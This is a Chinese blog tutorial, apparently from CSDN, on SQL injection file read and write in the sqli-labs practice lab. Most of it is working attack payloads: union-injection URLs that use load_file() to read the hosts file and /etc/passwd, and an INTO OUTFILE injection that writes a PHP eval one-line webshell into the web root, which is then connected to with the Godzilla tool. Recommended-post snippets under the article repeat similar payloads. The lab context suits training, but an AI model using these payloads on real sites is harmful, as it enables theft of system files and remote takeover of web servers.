sql 注入读写文件

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量775 收藏
点赞数 3
分类专栏: web渗透实战 文章标签: sql注入 web渗透 网络安全 sql注入读写文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132483954
版权

文章目录

sql 注入读写文件

本次实战,以sqli_labs靶场的第1关为例

环境配置准备

要想复现sql注入的读写,首先mysql就需要满足下面的条件

1.要想具有对文件的读写文件的权限,就需要保证当前mysql用户的File_priv为Y:

1.查询当前用户

select user();

image-20230824153503674

根据结果可知,当前mysql用户为root,主机为名为localhost

2.查询root用户在localhost的File_priv权限

select file_priv from mysql.user where user='root' and host='localhost'

image-20230824153704626

2.关闭MySQL 数据库有关于文件读写的安全选项secure_file_priv

在mysql的my.ini配置文件中找到[mysqld],在这个下面添加secure_file_priv=,然后重启服务器即可。

image-20230824152948040

查看secure_file_priv=的值

image-20230824164543579

image-20230824164448163

读取hosts文件

任务:利用sql 注入漏洞,读取hosts 文件

1.获取用户与主机信息

http://localhost/sqli_labs/Less-1/?id=-1' union select 1,2,user() --+

image-20230824155952197

获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限

2.验证File_priv权限

http://localhost/sqli_labs/Less-1/?id=-1' union select  1,file_priv,3 from mysql.user where user='root' and host='localhost' --+

image-20230824160340209

回显Y,说明有文件读写权限

3.读取hosts文件

使用load_file() 函数

http://localhost/sqli_labs/Less-1/?id=-1'union select 1,load_file("c:\\windows\\system32\\drivers\\etc\\hosts"),3 --+

image-20230824160828097

发现读取成功,看到了hosts文件的内容。

4.注意

想要读取某个文件,除了需要需要关闭mysql中的安全选项secure_file_priv与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。

如果目标是linux系统,就直接从/根目录下读取相应的文件了。

and 1=2 union select 1,load_file("/etc/passwd"),3

上传webshell

利用sql 注入漏洞,上传webshell,并用哥斯拉(godzila)连接。

利用select into outfile语句,将一句话木马信息上传至网站根目录下,因为要想访问木马文件,就必须将木马文件放在网站的根目录,phpstudy的根目录在www目录,具体的绝对路径就需要经过其他方式进行信息收集了。

1.上传一句话木马

<?php @eval($_REQUEST[777]);phpinfo()?>

通过联合注入的方式,

http://localhost/sqli_labs/Less-1/?id=-1' union select 1,"<?php @eval($_REQUEST[777]);phpinfo()?>",3 into outfile "G:\\SOFT\\netSecurity\\soft\\phpstudy2016\\phstudy2016-zc\\WWW\\2.php" --+

image-20230824162800825

2.哥斯拉连接

image-20230824163942015

image-20230824164013117

yuan_boss
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL 注入读写文件
Cwillchris的博客
06-04 828
SQL读写文件原理超详细讲解
SQL注入读写文件
m0_56578216的博客
08-24 1884
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。web 应用在服务器上的绝对路径,一般情况下是不知道的。但是系统敏感文件的路径是固定的。secure_file_priv=null,不允许导入导出操作。secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。secure_file_priv= ,不对导入导出操作做限制。
SQL注入文件读写
永远是少年
06-27 2229
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1017
就是利用文件读写权限进行注入,它可以写入一句话木马,也可以取系统文件的敏感信息。
SQL注入中的文件读写操作:技术解析与防范策略
weixin_43822401的博客
05-24 538
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些高级的SQL注入攻击中,攻击者不仅能获取数据,还能取和写入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,取或写入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
网络安全--SQL注入读写文件
weixin_43774199的博客
09-24 708
课程任务:讲解MySQL读写文件的条件,教会学生配置MySQL的导入导出功能和用户权限的修改。组织实验使学生掌握load_file()、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 任务目标:了解MySQL读写文件的条件,学会配置MySQL的导入导出功能和用户权限的修改,掌握load_file、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 A.读写文件的基本条件和使用 SQL注入文件读写 SQL注入有直接
关于SQL注入文件读写的方法总结
09-09
本文主要探讨了在SQL注入攻击中如何进行文件读写操作。SQL注入是一种常见的网络安全攻击技术,攻击者通过向数据库注入恶意SQL代码,从而控制数据库服务器。在这一过程中,攻击者不仅能够取数据库中的数据,还能...
SQL注入篇——文件读写注入
爱国小白帽
02-10 4156
文件读写注入的原理 就是利用文件读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
sql注入 - 读写文件
wcy19990628的博客
02-10 337
文件: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- - 在显示位上显示apachectl的配置文件的信息 这就是load_file()函数的用法 2.写文件 http...
SQL注入-文件读写文件取+写入:函数、使用方法
05-30 9286
SQL注入文件读写
SQL读写注入&MYSQL&MSSQL&PostgreSQL
weixin_74275515的博客
06-01 1158
1、SQL注入-MYSQL数据库2、SQL注入-MSSQL数据库(sqlsever)3、SQL注入-PostgreSQL数据库。
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2676
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
sql注入文件写入
一只菜鸟的博客
10-31 1835
sql注入中写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_file_priv有三种情况 在进行写入websell时,要注意参数secure_file_priv是否有指定路径或者是否为null。最好要获得root权限 空,表示导入导出没有任何限制 有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件 nul
SQL注入文件读写
MingShenfree的博客
10-27 341
当有显示列的时候,文件可以利用union注入 当没有显示列,只能利用盲注进行数据取 union注入文件(load_file()) //union注入取 e:/3.txt 文件 http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,load_file("e:/3.txt")# //也可以把 e:/3.txt 转换成16进制 0x653a2f332e747874 http://127.0.0.1/sqli/Less-1/?id=-1'
5-sql注入文件读写
m0_62978778的博客
01-05 723
高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限。一般可以与union中做为一个字段使用,查看config.php(即mysql的密码),apache配置…就是利用文件读写权限进行注入,它可以写入一句话木马,也可以取系统文件的敏感信息。outfile 后面不能接0x开头或者char转换以后的路径,只能是单引号路径。后面的路径可以是单引号,0x,char转换的字符。报错显示,遗留文件,漏洞报错,平台配置文件等。代表只能对该路径下文件进行读写
SQL注入 | mysql写入文件 | 文件
JacobTsang的博客
10-11 2977
mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出。 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生...
sql注入 文件读写
09-23
SQL注入是一种攻击技术,它利用应用程序对用户输入的不正确处理而使攻击者能够执行恶意的SQL语句。当应用程序未正确验证、过滤或转义用户输入时,攻击者可以将恶意的SQL代码插入到应用程序的数据库查询中。通过注入恶意代码,攻击者可以执行各种操作,包括取、修改或删除数据库中的数据,甚至执行操作系统级别的命令。 文件取是SQL注入的一种常见技巧之一。攻击者可以使用`load_file()`函数来取服务器上的文件。通过构造合适的SQL注入语句,攻击者可以在查询中使用`load_file()`函数来取指定路径上的文件内容。但是,为了成功文件,攻击者需要具有文件的权限。 例如,引用中的SQL注入语句`http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file('d:/test.txt')`尝试取`d:/test.txt`文件的内容。 然而,需要注意的是,许多现代的数据库管理系统已经采取了措施来预防SQL注入攻击。要防止SQL注入攻击,开发人员需要使用参数化查询或预编译语句来处理用户输入,同时确保在将用户输入插入到查询中之前进行适当的验证、过滤和转义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值